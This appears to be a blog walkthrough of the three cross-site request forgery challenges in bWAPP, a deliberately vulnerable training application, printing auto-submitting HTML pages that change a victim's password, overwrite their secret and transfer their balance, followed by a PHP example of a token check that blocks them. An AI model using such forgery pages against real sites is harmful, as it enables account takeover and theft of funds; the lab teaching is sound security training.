BWAPP CSRF Challenges Solutions | Cross Site Request Forgery

bWAPP, or a buggy web application, is a free and open source PHP-based web application for practising web pentesting and learning about web vulnerabilities in a safe environment. Its main goal is to provide a safe and legal environment for security professionals and students to test their skills and tools and learn about web security. To install bWAPP on your system, please visit the link below:

        http://www.sec-art.net/2018/06/how-to-install-bwapp-buggy-web-app-web.html

In this post we will go through all the CSRF (Cross Site Request Forgery) vulnerabilities in the bWAPP application.

For some basic information about the CSRF vulnerability, please visit the link: Introduction to CSRF

The exploit code used below can be found here: Github_Repo

Now let's start with the first CSRF challenge.


The first challenge is "Change Password", where we need to make the victim change their password through our CSRF attack page. The exploit code is:

ch1.html
<!-- exploit for Challenge 1 : CSRF vulnerability BWAPP -->
<html>
  <body onload="document.getElementById('xsrf').submit();">
    <form id="xsrf" method="GET" action="http://192.168.56.102/BWAPP/csrf_1.php">
      <input name="password_new" type="hidden" value="hacked">
      <input name="password_conf" type="hidden" value="hacked">
      <input name="action" type="hidden" value="Change">
    </form>
  </body>
</html>
As we can see, the above code submits the GET form automatically when the page is opened by the victim, and the password is successfully changed.


In the second challenge we have to change the user's secret. For this our exploit code is:

ch2.html
<!-- Exploit for challenge 2 : CSRF vulnerability BWAPP -->
<html>
  <body onload="document.getElementById('xsrf').submit()">
    <form id="xsrf" method="POST" action="http://192.168.56.102/BWAPP/csrf_3.php">
      <input type="hidden" name="secret" value="You have been hacked">
      <input type="hidden" name="login" value="bee">
      <input type="hidden" name="action" value="change">
    </form>
  </body>
</html>
The above code submits the POST form automatically when the page is opened by the victim, and the user's secret is successfully changed.


In the third challenge, there is a "Transfer Amount" page, where we can transfer funds from our account to a different account, and currently our account balance is 1000 euro. For example, we can transfer 100 dollars to account number 123-45678-90.


At this point we can make a CSRF page which transfers all the money to our given account. The code for it is:

ch3.html
<!-- exploit for Challenge 3 : CSRF vulnerability BWAPP -->
<html>
  <body onload="document.getElementById('xsrf').submit();">
    <form id="xsrf" method="GET" action="http://192.168.56.102/BWAPP/csrf_2.php">
      <input name="account" type="hidden" value="999-9999-999">
      <input name="amount" type="hidden" value="1000">
      <input name="action" type="hidden" value="transfer">
    </form>
  </body>
</html>

When the victim opens the above page, all 1000 euro will be transferred to account number 999-9999-999.



And now, as we can see, the account balance is 0 euro.
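
Each of the three forms above consists only of fixed, predictable fields, and two of them change state over GET, which is why a third-party page can build the whole request. The following is an added example, not code from this post or from bWAPP: it models a per-session anti-CSRF token check and runs it over the requests that ch1.html, ch2.html and ch3.html generate. The function names, the `csrf_token` field and the sample session are assumptions made for illustration.

```php
<?php
// Added example: models the server-side check that the three forged requests
// on this page lack. Function names and the 'csrf_token' field are assumptions.

// Issue one random token per session; the real form embeds it as a hidden field.
function csrf_issue(array &$session): string {
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Accept a state-changing request only if it is a POST carrying the session's token.
function csrf_check(string $method, array $params, array $session): string {
    if ($method !== 'POST') {
        return 'reject: state change requires POST';
    }
    $sent = $params['csrf_token'] ?? '';
    $want = $session['csrf_token'] ?? '';
    // hash_equals() compares in constant time; the known value goes first.
    if (!is_string($sent) || $want === '' || !hash_equals($want, $sent)) {
        return 'reject: missing or wrong CSRF token';
    }
    return 'accept';
}

// Constructed demo: the victim's session, then the requests built by ch1-ch3.
$session = ['login' => 'bee'];
$token = csrf_issue($session);

$requests = [
    'ch1.html (forged)' => ['GET', ['password_new' => 'hacked', 'password_conf' => 'hacked', 'action' => 'Change']],
    'ch2.html (forged)' => ['POST', ['secret' => 'You have been hacked', 'login' => 'bee', 'action' => 'change']],
    'ch3.html (forged)' => ['GET', ['account' => '999-9999-999', 'amount' => '1000', 'action' => 'transfer']],
    'real form (legit)' => ['POST', ['secret' => 'my new secret', 'action' => 'change', 'csrf_token' => $token]],
];

foreach ($requests as $name => [$method, $params]) {
    printf("%-18s %s\n", $name, csrf_check($method, $params, $session));
}
```

Run it with `php` on the command line. The forged pages cannot read the victim's session token from another origin, so only the request built from the application's own form passes the check.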

Conclusion :

So that's it for the CSRF challenges in bWAPP. For more web security related stuff:

http://www.sec-art.net/p/web-security.html